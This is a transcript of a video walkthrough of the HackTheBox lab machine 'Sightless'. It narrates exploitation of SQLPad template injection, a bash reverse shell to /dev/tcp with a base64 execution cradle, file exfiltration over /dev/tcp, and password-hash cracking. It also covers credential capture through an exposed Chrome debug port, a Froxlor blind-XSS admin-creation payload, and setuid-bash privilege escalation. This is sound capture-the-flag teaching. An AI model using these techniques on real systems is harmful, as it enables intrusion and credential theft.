What's going on YouTube? This is Ibsec, and today we'll be doing Sightless from HackTheBox, which is a nice, easy box. It starts off with finding an outdated version of SQLPad running, which has several vulnerabilities. We'll play with the server-side request forgery, but really, this just gets us recon information. It doesn't really do anything valuable. The key vulnerability is a template injection that leads to remote code execution and gives us shell on a Docker container, which we find credentials that lets us SSH into the host. From the host, there are two paths to root. The intended way involves exploiting a cross-site scripting vulnerability in Froxlor, but to simulate this XSS, there is a headless Chrome running with the debug port exposed. So we can skip the whole cross-site scripting by accessing the Chrome remote browser and then viewing the password they used to log in. Once we log into Froxlor, there are two paths as well. The first being exploiting Froxlor itself to get root. The other is changing credentials of a user, which lets us access their home directory over FTP, and that contains a Keepass database which we can decrypt and get access to the root SSH key. So with that being said, let's just jump in. As always, I'm going to start off with an nmap, so -sc for default scripts, sv enumerate versions, -vv for double verbose. This gives us the TTL and things like that. OA output all formats, put in the nmap directory and call it Sightless. Then the IP address of 10.10.11.32. This can take some time to run, so I've already ran it. Looking at the results, we have 3 ports open. The first one being FTP on port 21, and we see it's the Pro FTPD server. It's leaking the hostname of the box, which is sightless.hdb, and every command it tries to run, it's getting invalid command, try being more creative, so I don't know exactly what's going on here, but let's just move on. We have SSH on port 22, the banner tells us it's an Ubuntu server, and we also have HTTP on port 80. It's Nginx also running on Ubuntu and directing us over to sightless.htb. So let's go ahead and add this to our host file. So we'll do sudo v etc host, and then we can add 10.10.11.32 sightless HTTP, save that. And now let's take a look at the page. So we'll go to http sightless.htb, and we get hello, we are sightless.htb. How can we help you? So the first thing I always like doing is just looking at the source code to see if anything sticks out, if it's running like a CMS like WordPress or things like that. I don't see anything really that sticks out here. We can also look at the Wapalizer plugin. It's not telling us any new information, so let's just go test like index.html. Brings back this page. We can try an extension like PHP, doesn't exist, so chances are this is a static page. We can try like index as well, and that also goes 404. So I'm guessing this is just a static web page. If we see it accepting user input, then that'll change our mind a little bit later. But this is just the things I'm looking at. Now I'm going to all the links. We have a mail to sales@sightless.htb. Looking at SQLPad, we see sqlpad.sightless.htb. So let's go ahead and add this to our host file before we forget. So we can add SQLPad sightless HTTP, save that. We have Froxlor. Looking at this link, it just goes to froxlor.org. Database and server management goes to the contact me button. And this just sends an email to sales@sightless.htb. So we don't really have too much to go off on. We could look at FTP or just take a look at SQLPad. I'm going to connect over to SQLPad and see what this is about. So looking at the databases, we don't have any databases here. I was hoping maybe it was connected to a database and we could use like a get file command and start like reading files off the server. But we can't do that. We can try like select one. This is a relatively safe database command. Maybe if it gives output, then we can just start trying to execute commands on the box. Doesn't look like we can. If we go to new connection, look at the drivers, we do have SQLite, so we could maybe potentially do this. I'm not sure. Let's do tab SQLite test. Save. Does this create the box or the database? It looks like it does. So we can create files on this box. So potentially maybe if this is a PHP app, maybe we could create a PHP file. I'm going to go SQLPad GitHub and see what language this is. I'm guessing it's open source. Web-based SQL editor. Let's see. What is this? SQLPad. Let's go over to server. I'm guessing this is going to be Node.js. Yeah, it's Node.js. So let's see, what else can we do? We probably could do like a server-side request forgery type of thing. So we can going to create something called SSRF. Let's just do MySQL and see if we can make a connection over to us. So I'll do 10.10.14.8, which is my IP, and let's just connect on 9001. So I'm going to NC LVNP 9001. We can test this connection, and it does make one to us. So this is a server-side request forgery. We could also see connections running on localhost of the box. So let's test this out real quick. I'm just going to send this over to Burp, go into test, go in the repeater tab, and then I'm going to do 127.0.0.1. And let's see, the port, let's do 22. And we get connection refused. And this is telling me potentially that this is running in a Docker container or something like that. So I'm going to give it the IP address of 10.10.11.32. And we get packet out of order. So it actually made its way over there. It's just not a MySQL connection. We do port 80. Looks like it's hung. So I'm guessing maybe it can't get over to port 80 for whatever reason. I'm going to go open a new tab because whenever like that connection that's hung in Burp comes back and then like rewrites what's in the request panel, it becomes really annoying. So if we do 80, connection refused, 8080, 8000, another common port is like 3000 or 5000, and at 3000 it hangs. So this means it can't connect back to it, which means this is probably the port the web server is running on. If we didn't want to guess a bunch of ports, you could also send this over to FFUF. So if I copy this request to a file, I'm going to label it ssrf.request. Then we can do a FFUF request, specify the file, request proto, HTTP, word list. I'm going to give it a word list of, let's just do 29,000 to 3010. We can do 2990 to 3010, just so this doesn't take that long, right? Normally you do like 1 through 65,535 to test all the ports, but for this, just the demo, we want to keep it relatively quick. And I think that's all we need, right? Because the port has FFUF in it. So if I send it, it's going to hang, and it takes 10 seconds because that's what the timeout is. And it will just say one errored, and we won't get exactly what the data was. So we just want to get there. It's probably going to be another like 3 to 4 seconds. And they'll show how to change FFUF so we can actually see this, right? We have errors 1. So the best way to do this is to use the match time. So if I do FFUF H, we can do, let's see, match. And we can say match T for how many milliseconds to the first byte. And I know it says like the help is out of date. Match how many milliseconds to the first response byte. And if there is no response byte at the end, it's going to display it. So if we do a -MT, I'm going to say 500 milliseconds. And we need, what is it? Greater than 500 milliseconds, I think. So we're waiting here. It's been greater than half a second. We don't have it outputting yet. But as soon as that 10 seconds hits, it's going to display something and tell us, right? And the way I found this was I just went GitHub FFUF and see if I can find it real quick. We have to get over to the GitHub page. I don't know why that Google query is not coming back. We're not connecting to the internet somehow. Disable. I bet Burp is set on intercept. That's what happened. Yeah. So looking here, we can see timeout while time matcher is active, fuzz 3000. So it timed out reaching port 3000. So that's how we know that is the active port, right? We could change this FFUF to be 1 through 65535. And we'll let this run while we look at this issues, right? So I did this and I searched timeout. And let's see, is there recursion doesn't add job, 2 parameters. There we go. If I looked at this issue, when using FFUF MT time, it doesn't display anything. And then over here, we just have the response saying it will display everything now at the end of the request, right? So that's a nice little change. We're only at like 6,000 of 65,000. There we go. It has timed down and told us port 3000. But this was a lot to do about nothing, really. finding out we're in a Docker container doesn't really help us. It's just good recon I like doing. The one thing we missed was enumerating what version SQLPad is running. If I go to About, we can see version 6.10.0, right? And it links us over to the changelog right away, which makes it easy to identify how old this is. So if I search this page for 6.10.1, was it 6.10.0 I said? Yeah, 6.10.0. So 6.10.1, we have 2022, 03.13. So this is like 2 years old, right? So let's look for any type of exploit in SQLPad. So we can do exploit SQLPad. We could also look for like CVEs, things like that. Template injection. So we can look at this. So I'm guessing it's going to be the CVE 2022, right? There is looks like an SSTI. And it looks like we just say connections, add connection, MySQL, and input this into the database. So let's go back over to our request, go in repeater. Guessing the driver, we'll just intercept the request again and see exactly what it is. So we go manage connection, add connection. I'll call this SSTI. Driver, it said MySQL. And then in the database, I think, right? Is that what it told us to do? In the database form field. Yep. So let's go. I'm sure this doesn't really matter. We want to intercept this. So turn burp suite on. Proxy, intercept on. I think I accidentally killed it. Let's see. SQL 10, 10, 11, 32. Okay. Test. Don't know what that is. Here we go. So let's see. It's putting it in both fields, and we actually won't be able to see anything in temp pwn, right? We just get connection refused. Oh, because it's attempting to connect to this port. Let's do something that actually connects back. Let's do 10.10, 14.8. Let's do 9001. And then we'll do NC LVNP. I'll do a K before P for keep alive. 9001. So this way we can send it, and then we get a connection back. Awesome. I don't know if it actually has to connect. I figured if we're specifying a database, we probably should let the process connect before we let it die. Because if it can't connect, it may not even attempt to connect to a database, right? So now we have an exec field. We want to get a reverse shell. So I'm going to go echo-n. We'll do bash-i dev tcp 10.10 14.8 9001 0 and 1 like that. Let's base64 encode it. And the reason why I'm not doing a bash-c beforehand, because in my cradle that we're about to type, we're going to do bash-c here, right? We know we're executing bash is what I should say. So we can do echo base64-d and then pipe this over to bash. And let's see. I don't want the K when I'm doing a reverse shell. Let's just do 9000. Good. Okay, so the connection timed out, and because it timed out, it rewrote what was in my request field. I really, really hate when burp does that, but let's just retype this out. Base64-d, pipe it over to bash. Connection refused, but we get a shell. Awesome. So the connection doesn't have to come back. So you could leave the host and port to be whatever you want. It'll always just execute what's in that database field. And no surprise, we're in a Docker container. We already had known that because we did that like server-side request forgery a couple minutes ago. And I say no surprise we're in a Docker container just because of the host name of this box. But if I do lsla on /, we can see, there we go, the Docker entry point. So I'm going to do a which Python 3. We don't have it. Let's do which script. We have script installed, so we can do, let's do script -q dev null, pipe it over to bash, or not pipe, but execute bash. Then I'll do Control Z, stty raw minus echo fg, enter, enter. And now we have things like tab autocomplete. I'm going to do bash here so we have the script. We can do export term is equal to x term so we can clear the screen. So let's see what we have here. We have SQLPad.SQLite. So I want to go and grab this database file. So let's do nc lvnp 9001. Let's cat SQLPad.SQLite to dev tcp 10.10.14.8 9001. I forgot to direct this over to a file. So we'll do SQLPad SQLite. There we go. So we can now do SQLite 3 SQLPad.dump and dump all the data in here, right? So let's see. There should be inserts, right? There we go. We have 2 insert into users. So we have John and admin. And looks like we have, let's see, a null for John's password, I'm guessing, because we have admin null password hash. So this should be the password hash here. We have a potential password here. So let's see, did I copy that correctly? I need to fix that real quick. I copied that whole line break. So we have this. Let's go ahead and go over into the Kraken, which is just another box where I have Hashcat running. You can run it on your own machine. Just don't do it in a VM. I would recommend doing it on the host. So let's v hashes. We'll call this sightless.sql. Paste this in. Hashcat. Then hashes that. Opt word list rocku.txt. It's going to go in auto detect mode. It'll probably error out because we have to tell it we want mode 3200. There we go. So while that runs, let's see what else we have on this. There we go. So I am running as root. And if we look at etc passwd, we do have other users on this container, Michael and Node. I just say other users because that's 1000, 1001 as the ID. We cat etc shadow. We also have 2 hashes here. So after this, which it looks like it did crack, that password is just admin. So we should probably have some type of notes. So we'll do v notes.txt. I'm going to call it actually creds.txt. And this will be SQLPad, admin, admin. Okay. Then let's go and grab these hashes. So I'm going to grep for $6. Probably have to escape these $signs. There we go. Then we can do awk-f on a, can we do it on semicolon? I'm making sure there's no semicolons in the hash. Looks like we can. And then print 2. There we go. So we just have the hashes. I always like doing usernames too. And my terminal is doing that weird line wrapping thing. So we have to fix the TTY. So we can do STTY-A rows 28 columns 110. So let's set that real quick. STTY rows 28 columns 110. Okay. So we have that. Let's do a print $1 $2. So now we have username : the password. This is the way I like storing hashes when I crack multiple. And then we can go over into hashcat. V hashes sightless dot docker shadow, I guess. And we can paste this. Do /hashcat and docker shadow. And we have to give it the user flag. And that's going to tell it we have usernames in this. Maybe it's -username. No hash is loaded. Token length exception. I bet it's not 3200. Let's see. Wow, that cracked really fast. So what mode was that? 1800. And we have 2 matches right here, right? We have Blindside and Insane Clown Posse. It doesn't tell us the usernames here. We could just like go back and look at our results. But since we have it in the file, let's delete the word list, and I can just do --show. And Hashcat's going to tell me root's password is blindside, Michael's password is insane clown posse. So let's go back into our notes and we'll say docker root. Let's see, docker root, and this is blindside, and docker Michael insane clown posse. Okay, save that. And we can try SSHing into the box. So I'm going to do SSH. I'm going to do Michael first real quick. So I try Michael at 10, 10, 11, 32. Insane clown posse. And we get logged in. So it looks like that lets us onto the box. So we can save this and say Sightless SSH. Like that. There we go. And let's see. What do we have? Well, the first thing I always try when I'm root on a Docker container and low priv on the host is a privilege escalation we saw in the Intuition machine. And that is like sharing a block device. So I'm going to do lsblk, and we see the block device I want is 253. So I'm going to run mk nod dev. I'm going to call it like root fs block device 253.0. And we get operation not permitted. So the Docker capability is not there for us to exploit this. So I just forget about it. That is somewhat common, I found. So it's just one of those things I just try really quickly. You can probably like enumerate your Docker privileges to see if you have it. But I normally just run the command first because it doesn't take that long. So let's see, we're Michael on the box. Let's go to a PSEF command. So I'm going to do PSEF --forest. And then less-s so we can see all the running processes. And looking at cron, we have something interesting. So every little over 2 minutes, we're running this health check command, and that does the sleep 60. This is almost 2 minutes. We're running some administration. It's running Chrome driver on port 55521. And let's see, there's probably going to be a debug port. There we go. Remote debugging port is equal to 0. So we could stand up Chrome and access this browser potentially. And this is going to be a unintended route, but I'm going to show this first, and then we're going to show the intended way, right? So let's go ahead and look at this. So we want to do a SSLNTP to see all the listening ports. And one of these is going to be the actual Chrome port. I think the port that is shown, let's see. I think 55521, this is some type of like redirection port. So I don't think that's the port we actually want. It's probably going to be something in the 40,000 range. So probably this. Let's just try this first. So I'm going to do squiggly C as the first command. So squiggly, do enter squiggly C. There we go. Let's forward port 41845 to 127.0.0.1, 41845. And I always like using IP addresses, not localhost, because sometimes localhost goes to IPv6 and all things get wonky. So it's always safest just to use the 127 address. So now that we have that, I'm going to open up Chrome. Let's do Chromium. There we go. And then I think it's inspect. So we'll do Chrome inspect. There we go. Device target, and we'll do 127.0.0.1. And then what is the port? 41.845 is what we just forwarded. So we can put this, click done. And there we go. We have Froxlor, and it's pointed at admin Sightless HTTP. It just went over to index.php. So we can go inspect, and we can actually view what that browser is doing. And we have the network tab up. If I go to, well, right here, we don't see anything. It's going to log in. And when it logs in, we'll be able to see the payload that's sent, right? There we go. We have login name admin. The password is forlorfoxadmin. And I did not get to copy that. So let's just wait for it to happen again. It should happen probably in 5 seconds. And I'll press Control C so it actually gets copied this time. So there we go. It's typed it. Copy that. Paste. Awesome. So let's go back over to our notes. And we can say Froxlor. And that's admin like that. Save that. And now we have to access this page. So this is going to admin.sightless.htb port 8080. So let's forward that to, let's try like port 9000. I don't want to do 8080 because that's where Burp is listening. So I'm going to go SSH and do the squiggly C thing again, -L, 8080. Nope, this is where we're listening. We'll listen on port 9000 and go to 127.0.0.1, 8080. That port is now forwarded. So if I go over to Firefox, we try localhost and then 9000. I think Burp is set to intercept, so we can turn that off. We get domain is not configured. Remember, they were going to admin.froxlor.htb. I think IP address also works, right? Maybe not. So let's try changing the virtual host. So we can do, let's save that, sudo v etc host, admin, I think it was admin Sightless HTTP. I wish I actually paid more closer attention. Admin Sightless HTTP. Oh, let's try 127.0.0.1 again. That does work. So what happened? Let's do it again real quick. I did localhost 9000. It directed me to notice.html. And when I changed this, I still hit notice.html. But if I went back to the root, we get to Froxlor. So let's go to login. The username was admin. And then the password we had saved. It's a weird forlor frox admin. I think that's how you pronounce it. Paste this in. And then we get logged in. Now, there's probably a few ways to get RCE from here. We just click around like system configuration. Not that. Go to settings. We look at like PHP settings, Perl settings, maybe FTP even. Like you can change, well, this is enable, disable PHP-FPM. Like we can change binaries. So chances are we could like change the path to Perl to be a shell script and then execute that, right? The FTP server, maybe we can edit the pro FTPD settings to change a binary name. There's a few ways, and the actual intended way isn't to RCE this web server at all. We'll go over that at the end of the video, but we're going to show the unintended way really quick. So I was noticing there's like PHP-FPM versions, and it allows us to restart PHP-FPM. We can create a new config, and I'm going to call this pwned. And this isn't the most stable, and maybe I don't know exactly how to exploit this the best way. So I'm going to do a silly thing, and we'll do chmod 4755 on bin bash. Now, normally you'd want to like copy bash somewhere else so we're not changing the default shell, but I haven't had the most luck with like having this stable being able to run multiple commands. So we just want to make sure we do it in one shot, right? And if we copied bash over to, let's say, temp, then the owner is now Michael, so we have to change the owner to root. Then we have to chmod to give it the set UID bit. It's just annoying, right? So we can see the permissions right now, what you'd expect, 755. We want to change it to 4755, so that's the set UID bit. So let's change this to dynamic on the process manager control, save these changes. And if we do stat again, it has not changed. I think if we go to system configuration, settings, and then the PHP-FPM, we disable this. And now runs the commands that are in the restart when we go to start it, I think. So let's start this back up. We do a stat again, and it's still just 755. So that did not do it. If we go back to PHP-FPM versions, we see configurations not in use. So let's change this Froxlor vhost config from system default to our config. And then we can just save this. So we probably just destroyed this website. Maybe we want to do web 1, but let's just see what happens. So now we have the Froxlor vhost config. And I just realized the admin is going to be ourselves. So we may destroy our own box. We'll see what happens. We can always revert if something goes wrong. So PHP-FPM, look at it. It's still 755. Disable it. And then we're going to enable it again. And let's see. It's still just 755. This is what I've been meaning. It's not the most stable. I've had times when it just works every time. Let's edit this. What if we save it? Does it run? There we go. I don't know what just happened. Maybe you have to save it after it's running. But now we see bash is now marked set UID. We can do bash-p ID and we are root. So let's see real quick. Maybe that was it. Maybe I just had to click save. Let's do test. And I'm going to touch dev shm pwned. We want to make sure this is dynamic. Save. And weird error. So I don't know exactly how to come back from this other than reverting the box. I think it only affects the FPM daemon. So we're probably good. It's probably because we changed that site, right? Let's go settings, configuration. Where was it? PHP configs. Maybe it's this. You can set that back to default and restart it, see if that fixes it. But if not, then we'll just move on and do the intended way. So let's go configuration. Nope. Settings. PHP-FPM. Down. Let's hope this restores that. Up. PHP-FPM versions. Create new. Test. Let's do touch. Yep. Dynamic. Save. And yeah, we got some weird error message. So I think we're kind of SOL on getting code execution that way. But we already did. So if you wanted to, you can get it this way. But let's go take a few steps back. And we're going to do the box the intended way, right? So let's log out of this. Froxlor log out, because we don't need any of that to do the box. Well, you actually log in through FTP, but in order to get the actual credential for this, we weren't supposed to use the Chrome debug thing. We're actually supposed to use a CVE. So if we looked at like Froxlor exploits, there is a cross-site scripting vulnerability somewhere. Let's see, blind XSS and the advisories. And they have a payload here. So let's grab this. We'll save it and then copy it to a directory. And then look at exactly how this works. So copy, downloads, payload here. Look at it. It's all URL encoded. Let's cat it out and we will use burp to, I guess, decode it and see exactly what this looks like. So v decoded.txt, paste it. And now we want to search for all semicolons, replace them with a return character. And let's see, we probably want to clean up the pluses and make them spaces. So we'll do %s again, plus space G, there we go. So this is going to be what the payload does. The first line and the last line is just JavaScript. So we enter the cross-site scripting and then execute this code. And all this is a simple cross-site request payload that will send a post request right here over to demofroxlor.org admins.php with this payload. So we're just creating a new admin essentially, and we're hijacking the session of the user, right? So we're going to have to modify this because our box is not at demofroxlor.org. Now we could be really lazy. We don't need to put the domain there. We could just make the payload this, And then the browser is going to use whatever page it's on. And that's probably going to be what we do. But if you wanted to know the actual page, there were a few hints that would lead you down the path to get it, right? The first one is if we went back to the PSEF force command and look at all the processes, there's both Nginx and Apache running, which is pretty odd, right? You kind of want to look into the Apache config if you see that. If we go all the way back to the nmap just told us Nginx because we didn't have port 8080 listening, so we couldn't see 8080 was actually Apache. So that's alone is enough for you to go dig into Apache. But also, if we go back to burp and let's intercept a request to Froxlor. So we send this, go over to the repeater pane. We can see if we looked at this, where is the server? I swear it says it somewhere. Oh, there we go, right at the top. Apache 2452 Ubuntu, right? So there are hints that we should look at Apache. And if we look at Apache, we can go cat etc Apache sites enabled. And then we have a few. We could look at the Froxlor IPN port. And this is server name admin sightless.htb. So this is where the user is at. So we'd probably just replace the URL with admin sightless.htb. And it's probably going to be on port 8080. Let's see. Etsy Apache grep-ri 8080. Is Apache listening? Yeah. We're listening on 127.0.0.1 But that is how you get the domain admin sightless.htb if you wanted to put that in the payload. But I would recommend just not putting a domain and having it be like this, because when you put the domain, I think it's actually putting like get and then the full domain here. I wonder if that works. Let's do 127.0.0.1 9000 index.php. Nope, bad request. We specify HTTP. Yeah. Oddly enough, this is a valid HTTP request. I don't know if it's valid by RFC standard, but when you put the full URL in, I think that's what you're doing. I don't know if it's handling it programmatically or it's just doing it like that. So I'd recommend just removing that. So let's go back to payload.txt, and where we have HTTPS, I'm going to delete this. I'm going to delete demo froxlor.org, and there we go. This should be our payload. So if I cat payload.txt here, we can now copy this. And then if we go back to the blind XSS, it's telling us to provide an invalid username to the login. So let's go, let's intercept another request. We can forward this. Login. We will put this on repeater, and then we want to put our payload on the login name, because there's a page in Froxlor that will show you all the users that failed to log in. And for some reason, this template will just execute JavaScript on the user's browser. I don't fully understand what's going on here, but that's what this piece is doing. So this is like the template injection on the login, like the table of failed logins. And then this is the JavaScript that we're running. So if we send this request, it'll probably take a minute or two for the admin to hit the page. But when they do, it's going to add that account of, what was it, ABCD? So add ABCD, and then I think that's like ABCD, maybe at 1, 2, 3, 4. Let's just go back to the page to get it. So we'll try logging in with ABCD, like that. And the password ABCD, yes, it is at. Hopefully it works. Paste this. Let's turn Burp Suite off. Probably going to erase that because we had a failed login pending. Log in. And it did not log us in. Looking at the password, ABCD at 1, 2, 3, 4. That is not working. I wonder if we need to do admin. If this doesn't work in a minute, I'll just put the full URL. I wonder if there's something wonky with like the automation that it needs the full URL, because I think it should just work with this payload. Let's copy payload to payload2.txt real quick. Be payload2. And I'm going to put the whole thing. So this was what? HTTP admin Sightless HTTP port 8080. Cat payload 2.txt. And just before we do this, let's try it one more time. ABCD, like that. Okay, that's definitely not logging in. Let's grab payload 2, copy, and we will paste this. Admin Sightless HTTP. I think that's fine. The ABCD. I wonder if it's a cap. Nope. New login name, lowercase. Admin password. There's a capital A. I closed the tab, but I swear Froxlor is like an undo, reopen, close tab. Awesome. Admin password. Yeah, it's a capital A. Was that the issue? Oh, shoot. A, B, C, D, capital A. We get logged in. So I want to see if my other payload worked. I can show exactly what's going on real quick. So if we go to system log, we can see these are the users, and our Froxlor application has been hacked because we have this unknown user right here. Some reason that triggered it, right? So let's go log out real quick. I'm going to log in with admin so we can delete this user, because I don't think you can delete yourself, but we should be able to delete this user. So let's do cat, and we'll just create a new user actually. Let's do payload.txt. We already have that in our burp suite window. No, we don't. Copy this. We will paste this. And then where is, here it is. New login name is equal to, we'll do IPsec, and then that will be the password. So we'll send this. And then if I log in again, cat creds. I'm guessing by the time I do this, the cross-site scripting already hits and it created IPsec. We go to resources, admins. Yeah, I do exist. So that was the issue. The payload, the password here is actually a capital A. Let me download this and make sure that I did not screw that up. We'll replace that, sure. Open payload. And admin password is equal to %3D. Yep, capital A, B, C, D. Wow. So if you're copying it from this page, the payload is slightly different. So yeah. Now, I guess let's do the next step. So if we went in Froxlor, at this point, we're just supposed to be like one of the users we created. It doesn't matter. I guess I could log in with IPsec. IPsec, and then the password ABCD at 1234. There we go. So the intended way is not to get RCE on this, but instead we look at traffic and we do 2024, we can see there's FTP traffic and to the user web 1. So we want to look at what files are in web 1, which is John. So let's go and change John's password so we can FTP in. Let's go, not customer index. Oh, when I click that, like made me impersonate web 1, which was weird, but okay. So we can go here, users, we can edit, and then password. I'm going to change the password to please subscribe. Actually, let's put that on a clipboard and type it like that. Okay. Paste. And save. So now we have password for web 1. So we should be able to FTP to the box. So if we do FTP 10, 10, 11, 32, we get connected. And then if we wait like probably 20, 30 seconds, it will then prompt us for the username. I'm guessing what happened here is it's doing like a reverse DNS lookup and it just times out or something like that. So if we specify the username of web 1, it tells us SSL TLS is required. So I'm going to switch to a different binary, LFTP, because this one is going to support the protocol, right? So if I do dir, I probably have to specify username, right? Let's do LFTP web1 at like this. Specify the password, please subscribe. And then we can do dir. And it's going to probably fail SSL. And LFTP, let's see. LFTP, disable SSL. It's probably got to add verification as well. It's like set SSL verification no, I think. Let's see. SSL verify certificate false. So set SSL verify certificate false. There we go. So now I do dir and going to do the feat negotiation, whatever that means. And it should come back. TLS login failed. So it did not work with a login. Let's go back to the website and see if the user works. So I'm going to go new private window and we'll do 127.0.0.1 9000. Login web 1, password of please subscribe. Login. The password does work. Do a dir again. And let's see if it passes this time. I think there's some weird thing where the password gets set when you actually log into the Froxlor admin panel. So even though we changed the password web 1, nope, that did not work there. Let's go LFTP. That's why I put for the password. Okay. Hopefully this time it works. 10, 10, 11, 32. That should be the right IP. TLS, logging in, login incorrect. Okay, we must be doing something wrong. So let's go back here and let's see. If we go to the options, we set the password here. I wonder if there's a separate password for FTP. Like this is the web password, but I wonder if there's a way to set just FTP. We click web 1, we will impersonate them. Go to the FTP, accounts. This must be it. Let's set a password. Clipboard still says please subscribe. Click save. There we go. Now, moment of truth. Does this finally work? It's attempting the negotiation. I wish it didn't take so long to do this. But hopefully, after TLS, we send. There we go. That's it. So make sure when you set the password to set it on the FTP, right? So if we go look at Go Access, we do a dir. There is a backup directory. We can look at this. And there's a Keepass database. So we can do a get database.kdb, save that. And then let's see, it should be right here. And if we do kpcli -h, is it like, what is the argument? KDB? And then specify the database. We need the master password. I just tried password and it does not work. So there's probably a Keepass to John database. There we go. Let's copy this and we'll go back over to Hashcat and try to crack it. And that is a long hash. Holy cow. Okay. Where is, there we go. Nope. I think I'm out of Hashcat. So let's just SSH Kraken CD Hashcat v hashes Keepass, and then we will paste that hash, and then /hashcat this opt word list rockU, and see if it auto detects this. Specify the hash mode. It's either one of these, Keepass 1 and Keepass 2. I'm going to do 13400 because I don't know what key file only mode is. It looks like this is enough to get it started. And are we starting yet? Looks like we are. Look at the time. How long is this going to take? It says 43 minutes. Hopefully it doesn't take that long. Should only take, there we go. I was about to say, normally it's near the top of rockU if a cracking challenge is there. And the password is bulldogs. So let's go ahead and open that. So KPCLI, I always forget it's KDB, database, bulldogs, and we get logged in. So I'm going to do a find dot, and that's going to find all the things. And we can see there is SSH, root, and then pass. So I'm going to do a show SSH, and then we can add a -f to show the password. And we have root's password here. So let's do a SU and see if we can authenticate. Does not look like we can. So there is a attachment, which is ID RSA. I'm going to do attach this, and let's export it. And we'll export to home IPsec ID RSA. That's fine. And we finish. So I'm going to copy ID RSA over here. Let's see the permissions. chmod 600. Then we can do sh-i, ID RSA, root at 10.10.11.32. And we get invalid format. So let's look at the file. It looks like it's an SSH key. I think they're supposed to end with a line break. Still invalid format. Let's see the encoding. And whenever you see the dots in a SSH key, it's probably because it's terminated with 0D, 0A, and it only wants 0A. And the quickest way to fix this is DOS to Unix. So now let's XXD it. We can see it's just 0A. So let's use this key again. And there we go. We get logged in. So that is going to be the box. Hope you guys enjoyed it. Take care, and I'll see you all next time.